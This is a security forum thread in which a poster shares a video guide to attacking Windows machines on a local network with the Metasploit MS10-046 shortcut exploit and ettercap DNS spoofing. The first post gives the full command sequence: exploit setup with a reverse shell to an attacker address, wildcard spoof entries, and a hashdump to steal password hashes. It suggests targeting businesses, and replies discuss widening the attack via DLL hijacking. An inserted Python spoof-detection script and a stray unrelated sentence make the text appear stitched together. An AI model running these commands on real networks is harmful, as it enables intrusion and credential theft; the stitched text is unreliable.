Thread: [Video]MS10-046 Metasploit + ettercap DNS Spoof

  1. #1
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    [Video]MS10-046 Metasploit + ettercap DNS Spoof

    I realize there are a few mistakes in this video, I was nervous and slipped up. Specifically how reverse_tcp works.

    To explain the mistake: I mentioned in the video that reverse_tcp creates a socket on the victim machine and our attacking machine will connect to that socket. This is actually how bind_tcp works. reverse_tcp creates a socket on the attacking machine and lets the victim machine connect as a client. Just wanted to make sure it's clear I know the difference. I realized when I recorded it that I had made a mistake, as you can probably tell by the mumbling, but I just went with it.

    I believe that this attack would work really well on medium- and large-sized businesses, if you can get access to the network either via wifi or by physical means. The redirect to the UNC path looks very scary, but I think most users will chalk it up to terrible IT support or weird phantom network issues.

    I appreciate any criticism, this is the first video I've made and really the first time I've posted a guide on here.

    Commands:
    MSF:
    Code:
        use windows/browser/ms10_046_shortcut_icon_dllloader
    
        set SRVHOST ATTACKER_IP_ADDR
    
        set PAYLOAD windows/meterpreter/reverse_tcp
    
        set LHOST ATTACKER_IP_ADDR
    
        exploit
    ettercap:
    Code:
        cat /usr/share/ettercap/etter.dns
        *.com A 192.168.217.133
        *.net A 192.168.217.133
        *.org A 192.168.217.133
        *.gov A 192.168.217.133
    Code:
        ettercap -T -q -i eth0 -P dns_spoof // //
    MSF post exploitation:
    Code:
        sessions -i 1
    
        use priv
    
        hashdump
    This is the sixth time we have created a thread about it... and we have become exceedingly efficient at it.
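One way a defender could spot this kind of wildcard DNS spoof from resolver logs, as an added example (my code, not the poster's; the log format, client addresses and sample lines are constructed, and the detection keys on the same pattern the etter.dns above creates: unrelated domains across several TLDs all answered with one private address):

```python
import ipaddress
from collections import defaultdict

# Constructed sample resolver log: "client qname A answer_ip" per line.
# The first client's answers mirror what the thread's etter.dns wildcard
# entries (*.com/*.net/*.org/*.gov -> 192.168.217.133) would produce.
SAMPLE_ANSWERS = """\
10.0.0.21 www.example.com A 192.168.217.133
10.0.0.21 update.example.net A 192.168.217.133
10.0.0.21 docs.example.org A 192.168.217.133
10.0.0.21 weather.example.gov A 192.168.217.133
10.0.0.22 www.example.com A 93.184.216.34
10.0.0.22 mail.example.net A 93.184.216.34
10.0.0.23 intranet.corp.local A 10.0.0.5
10.0.0.23 wiki.corp.local A 10.0.0.5
"""

def parse_answers(text):
    """Yield (client, qname, ip) from 'client qname A ip' lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[2] == "A":
            yield parts[0], parts[1].lower().rstrip("."), parts[3]

def registrable(qname):
    """Crude eTLD+1 (last two labels); adequate for .com/.net/.org/.gov."""
    return ".".join(qname.split(".")[-2:])

def find_wildcard_spoof(text, min_domains=3, min_tlds=2):
    """Map (client, answer_ip) -> sorted domains for clients whose answers
    collapse several unrelated domains across multiple TLDs onto one
    private address, which is the footprint of a wildcard etter.dns entry."""
    seen = defaultdict(set)
    for client, qname, ip in parse_answers(text):
        seen[(client, ip)].add(registrable(qname))
    hits = {}
    for (client, ip), domains in seen.items():
        tlds = {d.rsplit(".", 1)[-1] for d in domains}
        if (ipaddress.ip_address(ip).is_private
                and len(domains) >= min_domains and len(tlds) >= min_tlds):
            hits[(client, ip)] = sorted(domains)
    return hits

if __name__ == "__main__":
    for (client, ip), domains in find_wildcard_spoof(SAMPLE_ANSWERS).items():
        print(f"{client}: {', '.join(domains)} all resolve to private {ip}")
```

A legitimate internal zone (the corp.local client) and normal public answers are not flagged, because they stay within one domain or resolve to non-private space.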

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Re: [Video]MS10-046 Metasploit + ettercap DNS Spoof

    Pretty nice
    The true reason I like it is that you used the dns_spoof from ettercap to make it easier; most people just go to the specific IP, which reduces the chances that it will work in a real-life demo.
    You did some nice explaining even for the basic stuff :P

    Congratulations !
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Junior Member g3ksan's Avatar
    Join Date
    Jan 2010
    Location
    Florida
    Posts
    93

    Re: [Video]MS10-046 Metasploit + ettercap DNS Spoof

    Thanks, I figured people would like to see a real world example. The MSF module could be swapped out for any browser autopwn attack for this to work, so this is kind of like a template for the other browser autopwn. I'd like to incorporate some sort of ettercap filter that will allow the user, once they've been poisoned and exploited, to be able to use the internet again. This would really make this feel more "complete" to me. I'm not sure how I'd be able to do it, but I didn't really know how to use ettercap the other day and here I am.

    [edit] thanks Archangel-Amael, should have just edited it myself.
    Not bumping, but just wanted to post some relevant information related to this exploit in MSF.

    Metasploit: Exploiting DLL Hijacking Flaws explains it better than I can

    Basically what it boils down to is that the vulnerability of ms10-046 is not just IE; it's a poor programming practice involving importing external DLL files when a program opens a file that is associated with it. iTunes was vulnerable till about last week. HDM released a tool that fuzzes/enumerates programs installed on your machine for these vulnerabilities automatically and creates malicious DLLs that you can import into MSF. So imagine what I did in the video, but now the attack vector has broadened due to the amount of vendors that seem to have this vulnerability in their products!

    If anyone has played with it yet, please post! I'm going to be messing around with this when I get home from work!
    Last edited by g3ksan; 08-24-2010 at 12:29 AM.